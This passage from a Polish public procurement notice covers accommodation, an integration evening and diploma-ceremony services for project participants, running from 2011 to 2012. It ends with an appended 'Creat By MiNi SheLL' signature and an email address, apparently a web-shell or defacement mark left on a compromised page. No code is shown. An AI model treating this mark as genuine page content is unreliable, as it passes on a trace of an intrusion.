Udział w wieczorze integracyjnym mogą mieć tylko uczestnicy projektu, tzn. wstępu na dyskotekę nie mogą mieć osoby trzecie. 

IV.Zapewnienie Sali w miejscu zakwaterowania, w niedzielę w godz. 1400 - 1500 w celu rozdania dyplomów dla uczestników (sala zwykła bez dekoracji).
Terminy pobytu: 16/17.04.2011, 21/22.05.2011, 11/12.06.2011, 24/25.09.2011, 22/23.10.2011, 21/22.04.2012, 26/27.05.2012.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com